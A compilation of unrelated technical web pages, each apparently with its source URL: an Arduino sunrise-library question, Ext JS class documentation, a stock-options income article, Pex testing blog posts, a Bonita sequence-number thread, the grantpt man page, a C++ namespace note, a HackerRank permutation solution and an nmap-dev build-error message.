I am trying to use the dusk2dawn library, and have been unable to get it to function how I expect. It is supposed to return sunset and sunrise times of minutes from midnight. It is returning -169 for sunrise and 531 for sunset. This was the same if I used the time from the RTC or entered it manually. What am I doing wrong? #include <Dusk2Dawn.h> #include "RTClib.h" RTC_DS3231 rtc; void setup() { Serial.begin (9600); while (!Serial); // wait for serial port to connect. Needed for native USB if (rtc.lostPower()) { Serial.println("RTC lost power, let's set the time!"); rtc.adjust(DateTime(F(__DATE__), F(__TIME__))); } } void loop() { int hours; DateTime now = rtc.now(); hours = now.hour() * 60 + now.minute(); // minutes since midnight Dusk2Dawn fburg(38.300713, 77.375166,-5); int rise = fburg.sunrise(now.year(), now.month(), now.day(), true); int set = fburg.sunset(now.year(), now.month(), now.day(), true); Serial.println(rise); Serial.println(set); delay(10000); }
https://forum.arduino.cc/t/dusk2dawn-issue/660712
Ext.Class is a low-level factory that is used by Ext.define and should not be used directly in application code. The configs of this class are intended to be used in Ext.define calls to describe the class you are declaring. For example: Ext.define('App.util.Thing', { extend: 'App.util.Other', alias: 'util.thing', config: { foo: 42 } }); Ext.Class is the factory and not the superclass of everything. For the base class that all classes inherit from, see Ext.Base. alias: List of short aliases for class names. An alias consists of a namespace and a name concatenated by a period, as <namespace>.<name>. The widget namespace is most useful for defining xtypes for widgets: Ext.define('MyApp.CoolPanel', { extend: 'Ext.panel.Panel', alias: ['widget.coolpanel'], title: 'Yeah!' }); // Using Ext.create Ext.create('widget.coolpanel'); // Using the shorthand for defining widgets by xtype Ext.widget('panel', { items: [ {xtype: 'coolpanel', html: 'Foo'}, {xtype: 'coolpanel', html: 'Bar'} ] }); alternateClassName: Defines alternate names for this class. For example: Ext.define('Developer', { alternateClassName: ['Coder', 'Hacker'], code: function(msg) { alert('Typing... ' + msg); } }); var joe = Ext.create('Developer'); joe.code('stackoverflow'); var rms = Ext.create('Hacker'); rms.code('hack hack'); cachedConfig: This configuration works in a very similar manner to the config option. The difference is that the configurations are only ever processed when the first instance of that class is created. The processed value is then stored on the class prototype and will not be processed on subsequent instances of the class. Getters/setters will be generated in exactly the same way as for config. This option is useful for expensive objects that can be shared across class instances. The class itself ensures that the creation only occurs once. config: List of configuration options with their default values.
Note: You need to make sure Ext.Base#initConfig is called from your constructor if you are defining your own class or singleton, unless you are extending a Component. Otherwise the generated getter and setter methods will not be initialized. Each config item will have its own setter and getter method automatically generated inside the class prototype during class creation time, if the class does not have those methods explicitly defined. As an example, let's convert the name property of a Person class to be a config item, then add extra age and gender items. Ext.define('My.sample.Person', { config: { name: 'Mr. Unknown', age: 0, gender: 'Male' }, constructor: function(config) { this.initConfig(config); return this; } // ... }); Within the class, this.name still has the default value of "Mr. Unknown". However, it's now publicly accessible without sacrificing encapsulation, via setter and getter methods. var jacky = new My.sample.Person({ name: "Jacky", age: 35 }); alert(jacky.getAge()); // alerts 35 alert(jacky.getGender()); // alerts "Male" jacky.setName("Mr. Nguyen"); alert(jacky.getName()); // alerts "Mr. Nguyen" Notice that we changed the class constructor to invoke this.initConfig() and pass in the provided config object. Two key things happened: the given values were merged with the defaults, and the corresponding setter methods were invoked. Besides storing the given values, setters throughout the framework generally have two key responsibilities: filtering or transforming the value before it is stored (an "apply" method), and reacting to the change afterwards (an "update" method). In the example below, age must be a valid positive number, and an 'agechange' event is fired if the value is modified. Ext.define('My.sample.Person', { config: { // ... }, constructor: function(config) { // ... }, applyAge: function(age) { if (typeof age !== 'number' || age < 0) { console.warn("Invalid age, must be a positive number"); return; } return age; }, updateAge: function(newAge, oldAge) { // age has changed from "oldAge" to "newAge" this.fireEvent('agechange', this, newAge, oldAge); } // ...
}); var jacky = new My.sample.Person({ name: "Jacky", age: 'invalid' }); alert(jacky.getAge()); // alerts 0 alert(jacky.setAge(-100)); // alerts 0 alert(jacky.getAge()); // alerts 0 alert(jacky.setAge(35)); // alerts 0 alert(jacky.getAge()); // alerts 35 In other words, when leveraging the config feature, you mostly never need to define setter and getter methods explicitly. Instead, "apply" and "update" methods should be implemented where necessary. Your code will be consistent throughout and only contain the minimal logic that you actually care about. When it comes to inheritance, the default config of the parent class is automatically, recursively merged with the child's default config. The same applies for mixins. Config options defined within eventedConfig will auto-generate the setter / getter methods (see config for more information on auto-generated getter / setter methods). Additionally, when an eventedConfig is set it will also fire a before{cfg}change and {cfg}change event when the value of the eventedConfig is changed from its originally defined value. Note: When creating a custom class you'll need to extend Ext.Evented Example custom class: Ext.define('MyApp.util.Test', { extend: 'Ext.Evented', eventedConfig: { foo: null } }); In this example, the foo config will initially be null. Changing it via setFoo will fire the beforefoochange event. The call to the setter can be halted by returning false from a listener on the before event. var test = Ext.create('MyApp.util.Test', { listeners: { beforefoochange: function (instance, newValue, oldValue) { return newValue !== 'bar'; }, foochange: function (instance, newValue, oldValue) { console.log('foo changed to:', newValue); } } }); test.setFoo('bar'); The before event handler can be used to validate changes to foo. Returning false will prevent the setter from changing the value of the config. 
In the previous example the beforefoochange handler returns false, so foo will not be updated and foochange will not be fired. test.setFoo('baz'); Setting foo to 'baz' will not be prevented by the before handler. Foo will be set to the value 'baz' and the foochange event will be fired. extend: The parent class that this class extends. For example: Ext.define('Person', { say: function(text) { alert(text); } }); Ext.define('Developer', { extend: 'Person', say: function(text) { this.callParent(["print "+text]); } }); inheritableStatics: List of inheritable static methods for this class. Otherwise just like statics, but subclasses inherit these methods. mixins: List of classes to mix into this class. For example: Ext.define('CanSing', { sing: function() { alert("For he's a jolly good fellow...") } }); Ext.define('Musician', { mixins: ['CanSing'] }) In this case the Musician class will get a sing method from the CanSing mixin. But what if the Musician already has a sing method? Or you want to mix in two classes, both of which define sing? In such cases it's good to define mixins as an object, where you assign a name to each mixin: Ext.define('Musician', { mixins: { canSing: 'CanSing' }, sing: function() { // delegate singing operation to mixin this.mixins.canSing.sing.call(this); } }) In this case the sing method of Musician will overwrite the mixed-in sing method. But you can access the original mixed-in method through the special mixins property. override: Overrides members of the specified target class. NOTE: the overridden class must have been defined using Ext.define in order to use the override config. Methods defined on the overriding class will not automatically call the methods of the same name in the ancestor class chain. To call the parent's method of the same name you must call callParent. To skip the method of the overridden class and call its parent you will instead call callSuper. See Ext.define for additional usage examples.
privates: The privates config is a list of methods intended to be used internally by the framework. Methods are placed in a privates block to prevent developers from accidentally overriding framework methods in custom classes. Ext.define('Computer', { privates: { runFactory: function(brand) { // internal only processing of brand passed to factory this.factory(brand); } }, factory: function (brand) {} }); In order to override a method from a privates block, the overridden method must also be placed in a privates block within the override class. Ext.define('Override.Computer', { override: 'Computer', privates: { runFactory: function() { // overriding logic } } }); requires: List of classes that have to be loaded before instantiating this class. For example: Ext.define('Mother', { requires: ['Child'], giveBirth: function() { // we can be sure that child class is available. return new Child(); } }); singleton: When set to true, the class will be instantiated as a singleton. For example: Ext.define('Logger', { singleton: true, log: function(msg) { console.log(msg); } }); Logger.log('Hello'); statics: List of static methods for this class. For example: Ext.define('Computer', { statics: { factory: function(brand) { // 'this' in static methods refers to the class itself return new this(brand); } }, constructor: function() { ... } }); var dellComputer = Computer.factory('Dell'); uses: List of optional classes to load together with this class. These aren't necessarily loaded before this class is created, but are guaranteed to be available before Ext.onReady listeners are invoked. For example: Ext.define('Mother', { uses: ['Child'], giveBirth: function() { // This code might, or might not work: // return new Child(); // Instead use Ext.create() to load the class at the spot if not loaded already: return Ext.create('Child'); } }); by specifying the alias config option with a prefix of widget. For example: Ext.define('PressMeButton', { extend: 'Ext.button.Button', alias: 'widget.
Create a new anonymous class.
- data : Object — An object representing the properties of this class.
- onCreated : Function — Optional; the callback function to be executed when this class is fully created. Note that the creation process can be asynchronous depending on the pre-processors used.
- Returns: the newly created class.

Retrieve the array stack of default pre-processors.
- Returns: defaultPreprocessors

Retrieve a pre-processor callback function by its name, which has been registered before.
- name : String
- Returns: preprocessor

Register a new pre-processor to be used during the class creation process.
- name : String — The pre-processor's name.
- fn : Function — The callback function to be executed. Typical format: function(cls, data, fn) { // Your code here // Execute this when the processing is finished. // Asynchronous processing is perfectly ok if (fn) { fn.call(this, cls, data); } });
- Returns: this

Insert this pre-processor at a specific position in the stack, optionally relative to any existing pre-processor. For example: Ext.Class.registerPreprocessor('debug', function(cls, data, fn) { // Your code here if (fn) { fn.call(this, cls, data); } }).setDefaultPreprocessorPosition('debug', 'last');
- name : String — The pre-processor name. Note that it needs to be registered with registerPreprocessor before this.
- offset : String — The insertion position. Four possible values are: 'first', 'last', or: 'before', 'after' (relative to the name provided in the third argument).
- relativeName : String
- Returns: this

Set the default array stack of default pre-processors.
- preprocessors : Array
- Returns: this
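The config machinery documented above (auto-generated getters/setters, with apply hooks filtering values before they are stored) can be sketched in a few lines of plain JavaScript. This is an illustration of the idea only, not Ext's implementation:

```javascript
// Minimal sketch in plain JavaScript (not Ext code) of the config
// behaviour described above: each config item gets a generated getter
// and setter, and the setter routes through optional "apply" and
// "update" hooks.
function defineWithConfig(defaults, hooks = {}) {
  const cap = k => k[0].toUpperCase() + k.slice(1);

  class Cls {
    constructor(config = {}) {
      this._cfg = {};
      // Merge the instance config over the defaults, via the setters.
      for (const key of Object.keys(defaults)) {
        this['set' + cap(key)](key in config ? config[key] : defaults[key]);
      }
    }
  }

  for (const key of Object.keys(defaults)) {
    Cls.prototype['get' + cap(key)] = function () {
      return this._cfg[key];
    };
    Cls.prototype['set' + cap(key)] = function (value) {
      const apply = hooks['apply' + cap(key)];
      if (apply) {
        value = apply(value);
        if (value === undefined) return this; // rejected by the apply hook
      }
      const old = this._cfg[key];
      this._cfg[key] = value;
      const update = hooks['update' + cap(key)];
      if (update && old !== value) update.call(this, value, old);
      return this;
    };
  }
  return Cls;
}

// Usage mirroring the Person example above:
const Person = defineWithConfig(
  { name: 'Mr. Unknown', age: 0 },
  { applyAge: age => (typeof age === 'number' && age >= 0 ? age : undefined) }
);
const jacky = new Person({ name: 'Jacky', age: 35 });
```

Here setAge(-100) would be silently rejected by the applyAge hook, mirroring how the docs' Person example keeps its previous age.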
https://docs.sencha.com/extjs/6.5.1/modern/Ext.Class.html
Caterpillar Inc. (Symbol: CAT). So this week we highlight one interesting put contract, and one interesting call contract, from the January 2018 expiration for CAT. The put contract our YieldBoost algorithm identified as particularly interesting is at the $80 strike, which has a bid at the time of this writing of $3.70. Collecting that bid as the premium represents a 4.6% return against the $80 commitment, or a 5.5% annualized rate of return (at Stock Options Channel we call this the YieldBoost). Turning to the other side of the option chain, we highlight one call contract of particular interest for the January 2018 expiration, for shareholders of Caterpillar Inc. (Symbol: CAT) looking to boost their income beyond the stock's 3.2% annualized dividend yield. Selling the covered call at the $105 strike and collecting the premium based on the $3.40 bid annualizes to an additional 4.3% rate of return against the current stock price (this is what we at Stock Options Channel refer to as the YieldBoost), for a total of 7.5% annualized rate in the scenario where the stock is not called away. Any upside above $105 would be lost if the stock rises there and is called away, but CAT shares would have to advance 10.8% from current levels for that to happen, meaning that in the scenario where the stock is called, the shareholder has earned a 14.4% return from this trading level, in addition to any dividends collected before the stock was called.
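The percentages quoted above can be checked with a few lines of arithmetic (illustrative only; the share price is not stated in the article, so it is backed out here from the quoted 10.8% advance needed to reach the $105 strike):

```python
# Illustrative check of the YieldBoost arithmetic, using the figures
# quoted in the article.
put_strike, put_bid = 80.0, 3.70
put_return = put_bid / put_strike             # premium vs. cash committed
assert round(put_return * 100, 1) == 4.6      # the quoted 4.6% return
# (4.6% becoming 5.5% annualized implies roughly ten months to expiration.)

call_strike, call_bid = 105.0, 3.40
# The stock must advance 10.8% to reach the $105 strike, which pins down
# the unstated share price at the time of writing:
share_price = call_strike / 1.108             # about $94.77
if_called = (call_strike - share_price + call_bid) / share_price
assert round(if_called * 100, 1) == 14.4      # the quoted 14.4% if called
```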
http://www.nasdaq.com/article/interesting-january-2018-stock-options-for-cat-cm763031
We just released an update of Pex that brings a very cool new feature, Unit Tests as Inputs, and updates for Visual Studio 2010 Beta 1, Code Contracts and F# Beta 1. As usual, this release also contains a number of bug fixes and small feature improvements, most of which address your suggestions from the Pex forum. Seeding the Exploration Part 1: Unit Tests as Inputs Before using heavy-weight constraint solving to explore hard-to-reach execution paths, Pex can now leverage already existing unit tests that call a parameterized unit test: Pex scans their body to extract the parameter values, and then Pex uses these values to seed the exploration. (In the past, Pex would have seeded the exploration by simply using the default values for all parameters, and nothing else.) Here is an example, where Pex starts the exploration of the parameterized unit test Multiply by reusing the values mentioned in the unit test MultiplySeed, as you can see in the first row of the table of generated tests. As an (intended) side effect, Pex also reuses the tests that Pex might have generated during earlier explorations. In effect, Pex never has to start from scratch again, but instead can reuse knowledge from earlier explorations. There is a big limitation in this first version of the new feature: Pex can only use values of primitive types, and arrays of primitive types, as seeds, and the values must be passed as parameters, not via PexChoose. The unit tests must be in the same class as the parameterized unit test, marked as a unit test, and have a simple structure, i.e., they must just create the input data, and the first method call must be to a parameterized unit test. Seeding the Exploration Part 2: [PexArgument(…)] to Fuzz Inputs and Help Pex Pex can not only extract values from existing unit tests, but there is in fact a general API through which seed values can be given.
In particular, you can use the new PexArgumentAttribute (and a bunch of related new attributes) to provide seed values. Here is an example: During the subsequent exploration, Pex will often reuse parts of the seeded values, which may make constraint solving easier for Pex. Also, when Pex cannot solve all constraints to leap beyond a difficult branch, then you can use this feature to help Pex by providing the values yourself. Object Creation with Invariants Code Contracts enable the specification of class invariants by writing an “invariant method” decorated with the ContractInvariantMethod attribute. For example, for a typical ArrayList implementation, this invariant method might read as follows: public class ArrayList { private Object[] _items; private int _size; ... [ContractInvariantMethod] // attribute comes with Code Contracts, not Pex protected void Invariant() { Contract.Invariant(this._items != null); Contract.Invariant(this._size >= 0); Contract.Invariant(this._items.Length >= this._size); } If you have such an invariant, and if you correctly configure runtime checking of contracts, then Pex will create instances of this type by first creating a raw instance, setting all private fields directly, and then making sure that the invariant holds. A generated test case for the Add method of the ArrayList class might then read as follows: [TestMethod] public void Add01() { object[] os = new object[0]; ArrayList arrayList = PexInvariant.CreateInstance<ArrayList>(); // creates raw instance PexInvariant.SetField<object[]>(arrayList, "_items", os); // sets private field via reflection PexInvariant.SetField<int>(arrayList, "_size", 0); // same PexInvariant.CheckInvariant(arrayList); // invokes invariant method via reflection arrayList.Add(null); // call to method-under-test } A limitation of the current implementation is that the type itself must be public, and the types of all fields must be public (but not the fields themselves.) 
Surviving unhandled exceptions in Finalizers Finalizers are especially problematic for test runners: there is no guarantee from the runtime when they will be executed, and when they throw an exception, the process terminates. This is not an uncommon scenario when you apply Pex to (buggy) code with Finalizers: it seems as if Pex suddenly crashes. In this version, we have improved the robustness of Pex with respect to those failures. Pex effectively rewrites all finalizers of instrumented types with a catch handler that swallows all exceptions and sends them to Pex's logging infrastructure. Visual Studio 2010 Beta 1 support We've updated Pex for Visual Studio 2010 Beta 1, the latest Code Contracts version and F# Beta 1. Send Feedback at your fingertips We made it even easier for you to ask questions about Pex, or to just tell us what you think, right from Visual Studio. Peli just announced that we have released Pex version 0.10. (You didn't think that after version 0.9 we would go straight to version 1.0, did you?) There are many exciting improvements, including better support for other test frameworks, VB.NET, F#, assertion generation, Code Contracts, and Stubs. Many of the changes are thanks to your feedback on our MSDN Pex Forum. Also, together with Tao Xie, we are going to give a Tutorial on Parameterized Unit Testing at the International Conference on Software Engineering (ICSE) next month on May 17th in Vancouver, Canada. Go and register as long as slots are available. This is a great introduction if you are interested in using Pex or other test input generation tools to test your code, but you were struggling with the new concepts such as Parameterized Unit Tests. We just released the most exciting iteration of Pex to this date: version 0.8. Update: Pex is now a DevLabs project, and available as a Microsoft Download for Visual Studio 2010 CTP. (It won't install without it.)
The Microsoft Research download still comes with the Microsoft Research license, so you cannot use it for commercial purposes, but it's perfect if you just want to try it out, or use it for academic purposes; it targets Visual Studio 2008 Professional, but all you really need is Windows XP with .NET 2.0. Besides lots of bug fixes and little improvements, this release comes with two huge innovations: Code Digger, and Stubs. New Experience: Code Digger. You can have that test suite! (And you won't have to sweat for it.) We have added an entirely new way of using Pex: Just right-click somewhere in the code you are currently editing, and then Pex will analyze all the branches in the code. Pex shows you a table of interesting input/output values, and you can save all findings as a unit test suite with a single button click. There you are. Enjoy your small test suite with high code coverage that integrates with Visual Studio Team Test! We call this new experience Code Digger. If the short description above didn't quite make sense to you, read my longer post on Code Digger, and check out the full Code Digger tutorial (it already refers to the forthcoming VS2010, but don't let that stop you). New Feature: Stubs Also shipping in this release: Stubs - A Simple Framework For .NET Test Stubs; also comes with a manual. It's a no-nonsense framework to easily create and maintain lightweight implementations of interfaces and abstract classes. Stay tuned for more: PDC is coming There will be further announcements. And don't forget: Pex is at PDC! Go to our talk at PDC and get the latest demo at the Microsoft Research booth! Do you control your code? Consider this method: public unsafe void TestX86(long x) { void* p = (void*)x; if (p == null && x == (1L<<32)) throw new Exception("bug!"); } After we released Pex recently, I came across a couple of interesting blog posts of people who tried out Pex, for example Ben Hall, Peter, and Stan. They all ran Pex on a small example.
In this post, I want to run Pex on a more complicated piece of code: The .Net ResourceReader, and all the other classes which it uses under the hood. The ResourceReader takes a stream of data, and splits it up into individual chunks that represent resources. In that sense, the ResourceReader is a big parser. I started by creating a new C# test project in Microsoft Visual Studio, and adding a reference to Microsoft.Pex.Framework. (If you try this at home, you need to install Pex first, of course.) Then I wrote a very simple parameterized unit test for the resource reader. It takes any (non-null) array of bytes, creates an UnmanagedMemoryStream with the bytes, and then decodes it with the ResourceReader. It's not a particularly expressive test, since it doesn't contain any assertions. All this test is really saying is that, no matter what the test inputs are, the code shouldn't throw any exception. (No exception at all? I'll investigate this in more detail later.)

[PexClass, TestClass]
public partial class ResourceReaderTest
{
    [PexMethod]
    public unsafe void ReadEntries([PexAssumeNotNull]byte[] data)
    {
        fixed (byte* p = data)
        using (UnmanagedMemoryStream stream =
            new UnmanagedMemoryStream(p, data.Length))
        {
            ResourceReader reader = new ResourceReader(stream);
            foreach (var entry in reader) { /* just reading */ }
        }
    }
}

Let's run Pex. I can now let Pex analyze this parameterized unit test in-depth by right-clicking on the parameterized unit test, and selecting Run Pex Exploration. (I am running our latest internal Pex bits, and we just renamed the "Pex It" menu item to "Run Pex Exploration". So if you just see a "Pex It" menu item, use that.) Pex now generates test inputs. In a nutshell, Pex runs the code, monitors what it's doing, and uses a constraint solver to determine more relevant test inputs that will take the program along different execution paths.
That sounds great, but the result is a little bit disappointing: Pex reports only two test inputs: An empty array, and an array with one element that is zero. (Again, I have to say that I am running our latest internal Pex bits. If you see a big black empty region in the lower right part of the Pex Results, titled with "dynamic coverage", then you can get rid of this waste of screen real-estate by pressing the button that I circled in red: We won't show this "dynamic coverage" graph by default anymore. I might talk more about this feature in the future. And now, back to the ResourceReader.) Pex tells us in bold letters on red ground that it encountered 3 Uninstrumented Methods. What does that mean? Well, Pex performs a dynamic analysis, which means that it runs the code, and then Pex monitors what the code is actually doing. However, Pex doesn't monitor all code, but only code that Pex instruments. Pex doesn't instrument all code by default, since the instrumentation and the monitoring comes with a huge performance overhead. And often it is not necessary to monitor all the code that is running. For example, when you want to test your algorithm, and your algorithm happens to write its progress to the console, then you still only want to test your algorithm, but not all the supporting code that hides behind Console.WriteLine. But back to the ResourceReader: Let's click on the 3 Uninstrumented Methods warning. We see that Pex neither instrumented UnmanagedMemoryStream nor ResourceReader. No wonder that Pex' analysis didn't find any really interesting test inputs! Pex also didn't monitor what happened in a call to GC.SuppressFinalize, but this relates to the .NET garbage collector, and probably isn't so important. (In fact, Pex has a built-in list of classes which don't need to be monitored, and we might add the GC class to this list in the future.) 
Let's select UnmanagedMemoryStream..ctor (".ctor" is the generic .NET name for constructors), and click on Instrument type, and repeat for ResourceReader..ctor. For GC.SuppressFinalize, I click on Ignore uninstrumented method instead. Pex persists my choices as assembly-level attributes in a new file called PexAssemblyInfo.cs in the Properties folder. It now looks like this:

using Microsoft.Pex.Framework.Instrumentation;
using System.IO;
using System.Resources;
using Microsoft.Pex.Framework.Suppression;
using System;

[assembly: PexInstrumentType(typeof(UnmanagedMemoryStream))]
[assembly: PexInstrumentType(typeof(ResourceReader))]
[assembly: PexSuppressUninstrumentedMethodFromType(typeof(GC))]

Pex did a little bit more this time -- three test cases! And another 7 Uninstrumented Methods warnings... What are the uninstrumented methods this time? As you can see, Pex' analysis already proceeded much deeper into the code, and now Pex hits all kinds of other methods. Most of the methods sound relevant. So I repeat the game, and let Pex instrument all of the types. And then I let Pex run again.

Boom! Pex still reports some uninstrumented methods (and lots of other things which I'll explain another time), but Pex also doesn't stop so quickly anymore. Instead, Pex is having a ball and it keeps producing more and more test cases. (If you run this example yourself, the precise results you get will vary. There is some non-deterministic code involved in the analysis.)

Pex even managed to produce a valid resource file! (Here, row 215 with the green checkmark.) When you double-click on any row, Pex shows the generated unit test code.
Here is the valid resource file:

[TestMethod]
[PexGeneratedBy(typeof(ResourceReaderTest))]
public void ReadEntriesByte_20080604_134738_032()
{
    byte[] bs0 = new byte[55];
    bs0[0] = (byte)206;
    bs0[1] = (byte)202;
    bs0[2] = (byte)239;
    bs0[3] = (byte)190;
    bs0[7] = (byte)64;
    bs0[12] = (byte)2;
    bs0[20] = (byte)7;
    bs0[24] = (byte)128;
    bs0[25] = (byte)128;
    bs0[32] = (byte)4;
    this.ReadEntries(bs0);
}

The resource file is 55 bytes long, and most bytes are zero, the default value of the byte type. All values which are not zero were carefully chosen by Pex to pass all the file-validation code of the ResourceReader.

Configuring the test oracle: Allowed exceptions

All the other rows are tagged with an ugly red cross, indicating that the test failed. Did these tests really fail? Let's see. In all cases, the code throws either an ArgumentNullException, ArgumentException, BadImageFormatException, IOException, NotSupportedException, or a FormatException. These exceptions don't sound so unreasonable, considering that Pex tried obviously ill-formed test inputs in the course of its exploration. If you look around the documentation of the ResourceReader (here, here, and here), you will find that in fact most of these exceptions are documented somewhere (although the documentation could be more explicit, and it's missing NotSupportedException). I can inform Pex that these exceptions are okay. The easiest way to do that is to select a failing test case in the table, and then click on Allow It.
Again, my choice is persisted as attributes in PexAssemblyInfo.cs:

[assembly: PexAllowedExceptionFromAssembly(typeof(ArgumentNullException), "mscorlib")]
[assembly: PexAllowedExceptionFromAssembly(typeof(BadImageFormatException), "mscorlib")]
[assembly: PexAllowedExceptionFromAssembly(typeof(ArgumentException), "mscorlib")]
[assembly: PexAllowedExceptionFromAssembly(typeof(NotSupportedException), "mscorlib")]
[assembly: PexAllowedExceptionFromAssembly(typeof(IOException), "mscorlib")]
[assembly: PexAllowedExceptionFromAssembly(typeof(FormatException), "mscorlib")]

When you run Pex again, all the exceptions that are marked as allowed are now tagged with friendly green checkmarks, indicating that they passed. But what is that? An OverflowException... (here, the red cross in row 98). Yet another undocumented exception...

You have seen how to configure code instrumentation settings, and how to tell Pex that certain exceptions are okay. But I think there is a much more interesting insight: by using Pex, we discovered some unexpected ways in which some complicated library code behaves. Library code that we build our applications on. Documentation will always be imperfect, and we have to test our applications to make sure that everything works together correctly. By using a white-box testing tool like Pex, which tried many relevant test inputs and not just one exemplary test input, we discovered behaviors (here, exceptions) we were not aware of before!

That's it for today. Another time I might talk about the constraints that Pex had to solve to create a valid resource file, how to get an idea of how much code was analyzed, how to visualize that Pex makes progress, and how to write more expressive parameterized unit tests.

This posting is provided "AS IS" with no warranties, and confers no rights.
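The OverflowException could be handled through the same mechanism as the exceptions already allowed. Assuming we decide it is acceptable behavior, one more attribute of the same form (my addition, not part of the original PexAssemblyInfo.cs) would mark it as allowed:

```csharp
// Hypothetical: also treat the OverflowException discovered above as allowed
[assembly: PexAllowedExceptionFromAssembly(typeof(OverflowException), "mscorlib")]
```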
http://blogs.msdn.com/nikolait/default.aspx
How to get a specific value of data after submitting on first task

Hi, just want to ask how to get a specific value of data after submitting on the first task. After I click the submit button and the approver clicks approve, a sequential number depending on the company of the creator will be generated. I want to get the max number for the company: if the company is the same and an existing number exists, then +1; but for newly created processes without a number, start with 1. But I cannot get the max number or the company of the processes. The task fails after I submit after approval. I do the generation in operations and set the number using Groovy. See below code and custom query:

Groovy code

int numSeq = 0
if (pettyCashHeaderDAO.findByMaxPetCashNo().toString() == "") {
    numSeq = 1
} else {
    numSeq++
}
def petCashNum = numSeq.toString().padLeft(6, '0')
return petCashNum

Custom Query

SELECT MAX(p.petCashNo) FROM PettyCashHeader p
WHERE p.isApproved = true
ORDER BY p.preparedDate ASC

Please help. Thank you guys.

Hi christianmichaelgarizala,

Unfortunately, the DAO object related to your object is not accessible from Groovy scripts; there is a known limitation that blocks us from using it. So you will never get your custom query executed and will always get an error!

I suggest you add a connector before the task to get the desired information, and in your Groovy code for the operation use it to increment and set your object attribute.

Cheers,
Marcos Vinícius Pinto

Hi,

In my process, I use a custom query to retrieve the max request ID and then increment it by 1 each time. Here is the custom query:

SELECT coalesce(Max(requestId), 0) FROM RPrenewalProcess

Note that the return type is count and all parameters are removed. Now in my task => operations I use the below script to increment the value:

(rPrenewalProcessDAO.MaxRequestId() + 1).toString();

Note that in my case the variable to hold the request ID is of type text. If you have a long variable, then there is no need to use toString().

Hope this helps
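The coalesce-and-increment pattern from the answer above can be sketched outside Bonita as well. This is a hypothetical Java helper (Groovy accepts the same code) that combines the `coalesce(max, 0) + 1` idea with the zero-padding from the original `padLeft(6, '0')` call; the class and method names are mine:

```java
public class NextSeq {
    // Mirrors the answers' pattern: treat a missing max as 0, add 1,
    // and left-pad the result to six digits, like padLeft(6, '0').
    static String next(Integer currentMax) {
        int max = (currentMax == null) ? 0 : currentMax;
        return String.format("%06d", max + 1);
    }
}
```

A first process instance (no existing max) would get "000001", and an instance created when the max is 41 would get "000042".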
https://community.bonitasoft.com/questions-and-answers/how-get-specific-value-data-after-submitting-first-task
NAME
grantpt - grant access to the slave pseudoterminal

SYNOPSIS

#include <stdlib.h>

int grantpt(int fd);

Feature Test Macro Requirements for glibc (see feature_test_macros(7)):

grantpt():
    Since glibc 2.24: _XOPEN_SOURCE >= 500
    Glibc 2.23 and earlier: _XOPEN_SOURCE

DESCRIPTION
The grantpt() function changes the mode and owner of the slave pseudoterminal device corresponding to the master pseudoterminal referred to by fd.

RETURN VALUE
When successful, grantpt() returns 0. Otherwise, it returns -1 and sets errno to indicate the error.

ERRORS
- EACCES - The corresponding slave pseudoterminal could not be accessed.
- EBADF - The fd argument is not a valid open file descriptor.
- EINVAL - The fd argument is valid but not associated with a master pseudoterminal.

VERSIONS
grantpt() is provided in glibc since version 2.1.

ATTRIBUTES
For an explanation of the terms used in this section, see attributes(7).

CONFORMING TO
POSIX.1-2001, POSIX.1-2008.
https://man.archlinux.org/man/grantpt.3.en
Used to prevent name collisions when using multiple libraries, a namespace is a declarative prefix for functions, classes, types, etc.

The keyword namespace has three different meanings depending on context:

- When followed by an optional name and a brace-enclosed sequence of declarations, it defines a new namespace or extends an existing namespace with those declarations. If the name is omitted, the namespace is an unnamed namespace.
- When followed by a name and an equal sign, it declares a namespace alias.
- When preceded by using and followed by a namespace name, it forms a using directive, which allows names in the given namespace to be found by unqualified name lookup (but does not redeclare those names in the current scope). A using-directive cannot occur at class scope.

using namespace std; is discouraged. Why? Because namespace std is huge! This means that there is a high chance that names will collide:

//Really bad!
using namespace std;

//Calculates p^e and outputs it to std::cout
void pow(double p, double e) { /*...*/ }

//Calls pow
pow(5.0, 2.0); //Error! There is already a pow function in namespace std with the same signature,
//so the call is ambiguous
https://riptutorial.com/cplusplus/topic/495/namespaces
In short: time complexity is O(N), space complexity is O(N).

Execution: The time complexity of this solution is a question, as is always true with hash maps. It is either O(N), O(NlogN) or O(N^2) depending on your particular implementation and hash algorithm. After I solved this, I looked at the editorial and was amazed by the complex algorithm that they proposed. This is much simpler. Yet I agree that the editorial is more time/space effective.

Iterate over the positions [1,N]. At each position, use the lowest available value from the [1,N] pool: either pos-k, or pos+k if pos-k is not available.

Solution:

import math
import os
import random
import re
import sys

# Complete the absolutePermutation function below.
def absolutePermutation(n, k):
    solution = []
    s = set(range(1, n+1))
    for pos in xrange(1, n+1):
        if pos-k in s:
            solution.append(pos-k)
            s.remove(pos-k)
        elif pos+k in s:
            solution.append(pos+k)
            s.remove(pos+k)
        else:
            return [-1]
    return solution

if __name__ == '__main__':
    fptr = open(os.environ['OUTPUT_PATH'], 'w')

    t = int(raw_input())

    for t_itr in xrange(t):
        nk = raw_input().split()
        n = int(nk[0])
        k = int(nk[1])

        result = absolutePermutation(n, k)

        fptr.write(' '.join(map(str, result)))
        fptr.write('\n')

    fptr.close()
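Stripped of the HackerRank I/O scaffolding, the core greedy idea ports directly to Python 3 (this is my own restatement of the function above, with k assumed non-negative):

```python
def absolute_permutation(n, k):
    """Greedy: at each position prefer pos-k, else pos+k, else no permutation exists."""
    available = set(range(1, n + 1))
    result = []
    for pos in range(1, n + 1):
        if pos - k in available:
            result.append(pos - k)
            available.remove(pos - k)
        elif pos + k in available:
            result.append(pos + k)
            available.remove(pos + k)
        else:
            return [-1]
    return result

print(absolute_permutation(4, 2))  # [3, 4, 1, 2]
print(absolute_permutation(3, 2))  # [-1]
print(absolute_permutation(3, 0))  # [1, 2, 3]
```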
https://nerdprogrammer.com/hackerrank-absolute-permutation-solution/
Nmap Development mailing list archives

-----Original Message-----
From: ambarisha b [mailto:b.ambarisha () gmail com]
Sent: Sunday, February 06, 2011 2:40 PM
To: Thomas Buchanan; nmap-dev () insecure org
Subject: Re: Version display patch

David, thanks for the revised patch. I have attached the patch after making the changes that you pointed out.

Thomas, thanks for pointing that out. Can you post the error you got on including dnet_winconfig.h?

Regards
Ambarisha

I tried the updated patch you attached, but with the following line:

#include "libdnet-stripped/include/config.h"

changed to:

#include "libdnet-stripped/include/dnet_winconfig.h"

This time I didn't get a compile error with dnet_winconfig.h, but did get the following linking error:

4>nmap.obj : error LNK2001: unresolved external symbol "char const * const pcap_version" (?pcap_version@@3QBDB)
4>.\Release/nmap.exe : fatal error LNK1120: 1 unresolved externals

